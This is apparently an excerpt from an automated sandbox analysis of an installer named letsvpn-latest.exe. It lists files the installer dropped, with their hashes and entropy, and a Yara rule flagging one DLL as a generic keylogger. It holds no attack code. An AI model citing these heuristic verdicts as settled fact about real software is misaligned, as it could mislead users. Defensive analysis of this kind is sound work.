                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18976
                                                                                                                                                                                                  Entropy (8bit):6.822573815542487
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:vvx21MWeLqW5nhqWOHlLf2KQcvBZ9gnHWma4S+ShjmM6IGBkSk:vJ2Wthq3b2KZBZ94S+ST6nk3
                                                                                                                                                                                                  MD5:9016D24A15C0FCABCA9B195685D546D3
                                                                                                                                                                                                  SHA1:3F59CC68BDE25DB5B256DD72608E53F243003027
                                                                                                                                                                                                  SHA-256:C19FA40FC81ADD0E8FA598F03BDEC26B4DBEA3501DF5658E06927CDC6E15FA49
                                                                                                                                                                                                  SHA-512:621081DD9967702E4FE16BAD789DC3D5D3BD725E77C17AEA6BE56D0E4920E647C7D54DA8C1D1FEA56C051D03ECE545781BBD6B8F02473F34261981334D0CCBC2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):51744
                                                                                                                                                                                                  Entropy (8bit):6.2708476869450225
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:o3wBccZdxuB8mQen6JxKjrlMZgR0Eot3qKY/mN:WcHmQPUktc/C
                                                                                                                                                                                                  MD5:9BD8BABD259D5301A0A1E5050A163BAE
                                                                                                                                                                                                  SHA1:38D666BB5268A260EA6AA38369FB82CC6029F9EA
                                                                                                                                                                                                  SHA-256:57D256764D6E780D505AFA63479A1C2A7A374079D0F93CC57C4967367585ACAE
                                                                                                                                                                                                  SHA-512:38F6FD5C2212C276D3C42C145012C4F3DBD95F7E93A817C8E988343B8B2CEF65A953529BE7313C38C1F0639C617B0E0D9D828B647E0DD0A35DCEF463096ACF4C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.955210507891377
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:3r97WquWYhqWOHlLf2KQcvBZ9A9S+ShjmM6IGBkSiaj:3RJ4q3b2KZBZYS+ST6nk5e
                                                                                                                                                                                                  MD5:359E96F1E3D4CF1B45357D9C02ACCEB9
                                                                                                                                                                                                  SHA1:B30FB5FB93B571E01F207AA954CCEA96253C4653
                                                                                                                                                                                                  SHA-256:75DC6A7021B4E412B98664D1C5017F458607B84C81D0BAA08B76F6F2005AFAC1
                                                                                                                                                                                                  SHA-512:A765E663ED6BED9C1EC8D59CAEA541F4C6AD3FE262A008FEADD5011D90E5D7E4B26F60F3E4A9BE7B8B68C420713103ADDCBE8D0930A10E8CF262ED4C5B656ED8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.906430383476696
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:q16eWLDWZhqWOHlLf2KQcvBZ95BS+ShjmM6IGBkS2h:G6Lyq3b2KZBZ9S+ST6nkRh
                                                                                                                                                                                                  MD5:4A8B84A7EF10B13E81857BFB02708FC3
                                                                                                                                                                                                  SHA1:0E63EBD59F13A628584F2DA2D0DB501B23EF97D2
                                                                                                                                                                                                  SHA-256:048643B783A173AEF2AC52005CB27DC9F70AD38ECF6FABD8C1868317692CDE2D
                                                                                                                                                                                                  SHA-512:077EA9B6229F2809630135C624EB9CF303D5546A78C6A98111D3E3B8023EBCF5C559F05DEC196BA70004C26BBA826E417007ED368FE6845758210E440224C9FB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18464
                                                                                                                                                                                                  Entropy (8bit):6.896763555557214
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:O8G4YC2W+wW8WpwW1hqWOHlLf2KQcvBZ9PlfS+ShjmM6IGBkSvacr:BGZ5lq3b2KZBZbS+ST6nkyaS
                                                                                                                                                                                                  MD5:BE61E3A1BB22AB977E7DE6538695BEAA
                                                                                                                                                                                                  SHA1:5B9059D915EDDAD58A1054660AAF0A5CC238D65A
                                                                                                                                                                                                  SHA-256:42891D1D8BC5F5A30DB038BAD254938E660D57FA9AC0CB29ACF46B1E3B77AE3E
                                                                                                                                                                                                  SHA-512:D77E08BD7D639DFCE63528C855CA08B456A7180CFCB62E7D90131F9A65DBD24FB70853F05674FAF64E03FB2DB414C7F095AD83054D9E13BAE5021F7CEC21DF89
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.998455717974313
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:H6ziqTEkGWvRWlhqWOHlLf2KQcvBZ9ypS+ShjmM6IGBkSN:HYT1Uq3b2KZBZqS+ST6nke
                                                                                                                                                                                                  MD5:4E6B8B111DEFA233D2371E499C205B11
                                                                                                                                                                                                  SHA1:83BA5DBBC30F3061DA4A5D8C48EB2600379DA7EF
                                                                                                                                                                                                  SHA-256:752FFB91E0F093EEDCC1FE30FDBDC8D638192D3ABD8A3593CA7E80DF5EACCD74
                                                                                                                                                                                                  SHA-512:1694C2E5C064F28D74CE3B4437F072FE856FD94C0FB2DBD5E5B084F3A50541A0B9C73B92EB8D0FB659019068B1E8D61B8907C537D4608EFD2F683087A8D862E5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.914453258066552
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:PUv7c7iWNCWLhqWOHlLf2KQcvBZ91b/OS+ShjmM6IGBkSL:PM7c1Rq3b2KZBZ7OS+ST6nkg
                                                                                                                                                                                                  MD5:9D8D0EA2C78FD96A911BF3309BA106CA
                                                                                                                                                                                                  SHA1:77A5CF297E4A096E9D4D69397FD1CE740C983449
                                                                                                                                                                                                  SHA-256:1A1BCB4B7D3D9F6237BC0AD500F569C67A3814D752CAC05EA36D88DE364503F5
                                                                                                                                                                                                  SHA-512:1FC4B5A840C3550DCD9C164EC50229707B0C229573FFDE68B0C298F2F34D0F5567385FBA0C72BD062394F0E9B5B04D2DC2F75521B3FC14DD0A3D97F407428876
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.960387412382897
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:bSWnRWNhqWOHlLf2KQcvBZ9w+Z1DcS+ShjmM6IGBkSZ:bzIq3b2KZBZNcS+ST6nkC
                                                                                                                                                                                                  MD5:C696F5E811F8F558D1B6330C03E8CC14
                                                                                                                                                                                                  SHA1:E54559000EBDEC51C7162C528487DA60B5AD3FEB
                                                                                                                                                                                                  SHA-256:373D38EA5B8D8A8D55390BB9813A7A72BF5B930A77319E1CA52A70ADC85CE25A
                                                                                                                                                                                                  SHA-512:DA33E7E6C193CA5689AFB28539671F9CE3B3C97A1227F8C3526A6A731CD0C6FBD700C90AA0A2DCF2BFD8263BF56BCEFB92F9238F98DBF38FD1206CEE04A559AE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):101920
                                                                                                                                                                                                  Entropy (8bit):4.745461540655048
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:iHmt9tmMLbLR6330XUb9GYQtq3b2KZBZmS+ST6nkM:i+d6336UbIL43qK4/mG
                                                                                                                                                                                                  MD5:F23E3999FCDB4144DAC81D4808D2B897
                                                                                                                                                                                                  SHA1:B6055D4DBC6EA3C380787BE1D76332A033F5CFA4
                                                                                                                                                                                                  SHA-256:94537ED511AB56D787064EFCA837CC05FB99B2192F127C35668061E4CD69A09A
                                                                                                                                                                                                  SHA-512:F2F4FADE96296AE065814FE80AF8FBE521E73C8AFC6986DA2EEC9A0FC35DD8704C13052DA7204110FD2F89EC746562C5EB7E752D5B238AEE21864601A9DF9659
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):121376
                                                                                                                                                                                                  Entropy (8bit):5.089922899922607
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:or7hqeNzclb+af/wFGfdpOOJWOQE9/TBLW/Uwm0q3b2KZBZgS+ST6nk7:or7hqeNzclR/CWpKsRBLW/Ef3qKW/m9
                                                                                                                                                                                                  MD5:CA100065CAC383E78E4FAFC5610FA289
                                                                                                                                                                                                  SHA1:57AB1CF0E9FE01100DB886C2C639BE85CCA96679
                                                                                                                                                                                                  SHA-256:3F3E6F279A50164480B76A204969339069409AC164A1DCAA9329D552B92B288D
                                                                                                                                                                                                  SHA-512:E3C8ACE8EBCBA78335436451449F6CAD5895E82DEFD8C7B8AE26656C3A70AA2D76EA6AD81D3B816F00CC4D493B93DB7D943A43B504460A53EE3B3214FBD37C22
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):130080
                                                                                                                                                                                                  Entropy (8bit):5.9702765639204065
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:/Ax1gFvyQ1P7QozISTBCW1Nt+Gi/yOWi1/Xg6iyhUkuXlf/m:/EwJjRB5z2
                                                                                                                                                                                                  MD5:0E444739D07678A3F6EA4202C4237832
                                                                                                                                                                                                  SHA1:0689C9CDAD379B4B0952674A7BF75A5A1F2F33A9
                                                                                                                                                                                                  SHA-256:A3AAB8CA7B0747242207D1223E241E602B45BA69F25BA5B611A12EEACD19EC1A
                                                                                                                                                                                                  SHA-512:85F6D4920D93F8EE2BB7A384424C9EEA25CC5591BF7A7301BDC31170944549B3860A90C5694F194EE0F9CD85F0EA053E89039F95FF806B735E526D583EE7E0BF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PNG image data, 256 x 256, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12243
                                                                                                                                                                                                  Entropy (8bit):7.820583648387655
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:WLj1H8FzmdclL4jx3c4yrJuhRof6YQURyMGf0gDSvGrEHsf8Aw47b:QpiYccZrZRof6YQUPPgDSvGr+q8D47b
                                                                                                                                                                                                  MD5:AA3CFA4A176584F79EEE7F74032E446F
                                                                                                                                                                                                  SHA1:752B97FF9A8D28E92F6FB35EE24FF3DA2E8DEEE5
                                                                                                                                                                                                  SHA-256:34A9425F58EDB250E7FBD9217D73A5AD96D1986ACA3520AFE8CADB66E32E3F33
                                                                                                                                                                                                  SHA-512:A824DA84DEDAFCDCEACDF9D602B5F89526168E6350E7478D31A5562A8B12D496FB5205B62EDFB2DF1C3896D6B24DA761A1211CF342C1AFF8E6235C4569A54BFF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):73760
                                                                                                                                                                                                  Entropy (8bit):6.270537704846323
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:DXSaVnItYw1N0tUUTAz/kI5JIol/NkIgJ4Wj3qKK/mS:D5VnqzNaNE4IvIolSIgJjje/9
                                                                                                                                                                                                  MD5:A0442D522D6D577EB8727E1F1019413B
                                                                                                                                                                                                  SHA1:D39D4879650B86A7B9EEFD44418236432E84AAA3
                                                                                                                                                                                                  SHA-256:B4876C4E26053DDC8E3D198C20E2EB0A45D4B0A935AB7493CC7C5B41F93FAE67
                                                                                                                                                                                                  SHA-512:9C024876A876FE3B9F708EB9B3F6BAA3BBD3984542CD8F6DFFB16BEF693E40754371D5FA780EF204DDD09B37D2C1C0B68C18AB6D93CF969732F9CBD046A27CA9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):54304
                                                                                                                                                                                                  Entropy (8bit):6.372264039844505
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:hDcl7W1UiZTo1ooEqzW3SQwiNsI8l5wwyvUPrYZBkcDTq3b2KZBZuS+ST6nkW:h8QpZTsooEX3SQwr9y4UZRDu3qKA/m0
                                                                                                                                                                                                  MD5:1CE428CFF43522A1AF4FACB23F71D608
                                                                                                                                                                                                  SHA1:C8F354FBDFB68B356CB4146A1EE945A2375FBAD5
                                                                                                                                                                                                  SHA-256:2956DDEB4C4D1284C52A099305DA39243888F9DAD5A15284C89A2D2238E07107
                                                                                                                                                                                                  SHA-512:06CFA947BB50B6E5A346ED6B390DEC8A0004B282A306B9F8F3CA69EF4587AAFEDC42536C12308BDFF57261F586C9481C7C3961188AAE4BE5C19C4CF7102CDDB7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) Aarch64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):127008
                                                                                                                                                                                                  Entropy (8bit):6.1002030171865975
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:7DdMkQCUK86ryzDWs0MxThVvTe6sWkddGDGEtg3q2LOOCN+y3qKI/m2T:7Ddef+yR17exwDGEtg3q2LOdN+yU/lT
                                                                                                                                                                                                  MD5:549B6EC92306E2450F143AA585DF6DB2
                                                                                                                                                                                                  SHA1:E3AC456C76C4977E9C33A69DD649F13628C10686
                                                                                                                                                                                                  SHA-256:9C5602FEABC5C7C4D96551400282CAE11E740D87141476DCE5C7B5060EF5AEA0
                                                                                                                                                                                                  SHA-512:3ECA35112F57FC3DCDD25CD554A7E8F53F01DED73241027CD5C6C2EA57EE1B061C2D7DCE8B33716A615C2233B8C268712125FDFD0F800E42FCA8EE872495A04C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.786293052327813
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:JEZLkwA5qKV3XWe6lW1hqWOHlLf2KQcvBZ9YsTS+ShjmM6IGBkSS:yxkwAlaQq3b2KZBZtTS+ST6nkJ
                                                                                                                                                                                                  MD5:489C8B9F4E37E1D1FEF662341FC3F95A
                                                                                                                                                                                                  SHA1:3AE58E1054B8D994F1E2D26402BA285F16257116
                                                                                                                                                                                                  SHA-256:30290D2070FB124A2BD8DB48B11CFBEA21B0AFD5BDC28F3401FEDD8C3F9B66A8
                                                                                                                                                                                                  SHA-512:7D6C7A93ED7CE939DFF8BEBB5FD5F5687E8A877A7019ACEF0E4F2797001657561CB55B834BE9BCFE2DED8FA23F8CA5C8C96EFAD6EE71D1E6AB5800E82ACC529A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.788421298560347
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:4qmGsHW08We6lWMhqWOHlLf2KQcvBZ9DjqgS+ShjmM6IGBkSZRI:4BGsH1xHq3b2KZBZFlS+ST6nkGI
                                                                                                                                                                                                  MD5:D8C061C0526368E2A9D9B90BAE61E764
                                                                                                                                                                                                  SHA1:E83C1F781F339BC06A3FE0E27701869EE79B177C
                                                                                                                                                                                                  SHA-256:39D5F8E342DB9B9A694944D03099EB2C6CCAE1F926D829858D216985A54066F7
                                                                                                                                                                                                  SHA-512:D15944E01ADEFACCED782C9BA76851EE025A93AD6D5FE52392834A9D88AEDABBA39BE3B83B75A37C3D52B4DA67B83961237486300A9B8DC97605CAEACA055D3A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.754267815741174
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:611LpDt4We6lWHhqWOHlLf2KQcvBZ9AE9S+ShjmM6IGBkSZ:iBdqq3b2KZBZB9S+ST6nkK
                                                                                                                                                                                                  MD5:335DDC15C604733F3A3A74150F7EE386
                                                                                                                                                                                                  SHA1:017B875AD2AF40A2245DA464A34572509007D6CB
                                                                                                                                                                                                  SHA-256:514D89ED6AC01AE7B71A64C36B0A40FEC69973F5E0D4BB42DA8CF2DBA9278E0F
                                                                                                                                                                                                  SHA-512:208135523870EDC892F236B20C8C1B49E2922C888C6BC9403CC29F7BFF6A94FB41D69AFCD427A102E9016B032DC56424EFE4BC458974058ACF47398DA2BA939D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.791970793161073
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:LsxhehdMDxbFWe6lW5hqWOHlLf2KQcvBZ9XKiNS+ShjmM6IGBkS4:4vy+DA4q3b2KZBZbS+ST6nkr
                                                                                                                                                                                                  MD5:63C242659089C61B00298F898CED5B2E
                                                                                                                                                                                                  SHA1:97104D6BAC9B264B9CEE15F2C4B82ABE80872192
                                                                                                                                                                                                  SHA-256:706ECAC3AB9529F2AA8782D9CDAC358225436850685F98FEA7B557A89941A86B
                                                                                                                                                                                                  SHA-512:A0E5D459839FD79E0E2CC58EB1B956D931503710DE3E0A733F6DD5E29787CFE9D6562FEB49421C220E0F5C013F028B9E88C61FBD837D91799B7C98992942E51E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.755805881100906
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:79WLKzFWe6lWUhqWOHlLf2KQcvBZ9lhbS+ShjmM6IGBkS8b:5gKz+rq3b2KZBZ1bS+ST6nkfb
                                                                                                                                                                                                  MD5:4E8BBD3CFDFF50E0E2A8F1CF7D7C0B1B
                                                                                                                                                                                                  SHA1:6C9BEEA42873A8367AA26CA6151176EEFFB69331
                                                                                                                                                                                                  SHA-256:850A6C7B1D216178671F60C56295CECE8B801F3801CD2670C0193E29DC9ED91B
                                                                                                                                                                                                  SHA-512:7D0722A6CBEA607B56C0FE5D11A31EC44314F3A694D1E45811C02EEF96D7151B700D202F39DD3DEE80BF4C2118AA8892F1464FAC74469855E70C34111E2BC7A4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22048
                                                                                                                                                                                                  Entropy (8bit):6.900258148465496
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:rNeZmFLRnyGO00Ik4oF3eUntWe6lWdhqWOHlLf2KQcvBZ9bxJS+ShjmM6IGBkS8:rQZmFLRnyGO00Ik4oF3eUnGYq3b2KZB+
                                                                                                                                                                                                  MD5:1CE86E199C50E28E4423BCDEC3B337C5
                                                                                                                                                                                                  SHA1:8EF284E87F8D9C1C0B78F826DBC42A381D753C73
                                                                                                                                                                                                  SHA-256:52D25AE7CF6ECC8746DDCFF279766A59162EE1A8D25FD7424E7A27E76EA9E7CA
                                                                                                                                                                                                  SHA-512:731C04BA44CEE917C3A255AD534C325D1511A1151CA4C304E18666AD28EA650A3A280A257E3E2C865D0F12A97AB5246500B8F97ED51E4A1A9121DDAEF38E9C94
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21536
                                                                                                                                                                                                  Entropy (8bit):6.9205398032930345
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:xPP73AIGoWe6lWYhqWOHlLf2KQcvBZ9c2MS+ShjmM6IGBkSl:xX7AIGNTq3b2KZBZ9MS+ST6nkC
                                                                                                                                                                                                  MD5:B54150F34E9E5ED23D69BD822937A52B
                                                                                                                                                                                                  SHA1:E2FF594B6D9BE3A90725B1BA169A9027ECA33ABC
                                                                                                                                                                                                  SHA-256:3E866F4F1F18EF5CF7C9F6E4BBEF74ACD69120004A52778A8FD7CFC6E14066A4
                                                                                                                                                                                                  SHA-512:CED65F0CAED6DE841339140294D707FF49BA89199B7891A95A5CE7047F5203CAF570EF5831533C94073D3A190321B6BAB4A4085A1923F218843D674E8F147FC9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10689056
                                                                                                                                                                                                  Entropy (8bit):6.3491186908804655
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:98304:GDzluVRWdkyvuIeBGrez6CYG7m68SxIc6b0tTziC002MZ:Mzln6aM1oC0JMZ
                                                                                                                                                                                                  MD5:ADABDAFF05BC4BA3CADF3A8F7248617F
                                                                                                                                                                                                  SHA1:0EEA8F9BE4CDF3D3933A35A2F2620C1E2AC57F4F
                                                                                                                                                                                                  SHA-256:75408CEC6E96255CDFA76163A26887E3DB726413CA5DF27A7331286282BB8450
                                                                                                                                                                                                  SHA-512:D792B6CBE8E29DC50FBC126C23535463E7F6E766DD7E9F5C6A63D476F7939DE8FC41EA17F8119858954638A591819F114794B6B26DBF240E408357A0D5D260B6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Program Files (x86)\letsvpn\app-3.12.0\libwin.dll, Author: Joe Security
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1510
                                                                                                                                                                                                  Entropy (8bit):5.153642637730153
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:JdGw/e40s+FpMU+nHnUn+OtxXqY9JXMi7c+nHQ7qY/DJYLLYi:3Gw/x0s6peHhOtRPJX3rHSF6Lsi
                                                                                                                                                                                                  MD5:7A7521BC7F838610905CE0286324CE39
                                                                                                                                                                                                  SHA1:8AB90DD0C4B6EDB79A6AF2233340D0F59E9AC195
                                                                                                                                                                                                  SHA-256:2A322178557C88CC3C608101E8FC84BFD2F8FA9B81483A443BB3D09779DE218D
                                                                                                                                                                                                  SHA-512:B25DFDCE0977EAF7159DF5EABE4B147A6C0ADAC39C84D1C7A9FE748446A10C8D2E20D04CF36221057AA210633DF65F2A460821C8C79A2DB16C912EC53A714D83
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>...<log4net>....<logger name="logger">.....<level value="ALL" />.....<appender-ref ref="LogAppender" />....</logger>....<appender name="LogAppender" type="log4net.Appender.RollingFileAppender">.....<param name="File" value="Log\\" />.....<param name="AppendToFile" value="true" />.....<param name="MaxFileSize" value="10240" />.....<param name="MaxSizeRollBackups" value="100" />.....<param name="StaticLogFileName" value="false" />.....<param name="DatePattern" value="yyyyMMdd&quot;.log&quot;" />.....<param name="RollingStyle" value="Date" />.....<layout type="log4net.Layout.PatternLayout">......<param name="ConversionPattern" value="%d [Level: %-5p] [Thread: %t] [class.%c] [%x]: %m%n" />.....</layout>....</appender>....<appender name="TextAppender" type="log4net.Appender.RollingFileAppender">.....<param name="AppendToFile" value="true" />.....<param name="RollingStyle" value="Date" />.....<param name="DatePattern" value="&quot;
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):282144
                                                                                                                                                                                                  Entropy (8bit):5.7076450783689925
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:CG0WgexKpGi8PnJcerXUaxX3HVeES4BEIqTTpX/4ormGpnaVTSGCkMhkEn7GAhCT:CJrycoB3HVeESME3pnaVTS1nh7hCa9A
                                                                                                                                                                                                  MD5:C5098FF401B766E6E554499D37D0B716
                                                                                                                                                                                                  SHA1:FD4C3DF050EC2B30740E2D62B27A9E375401F190
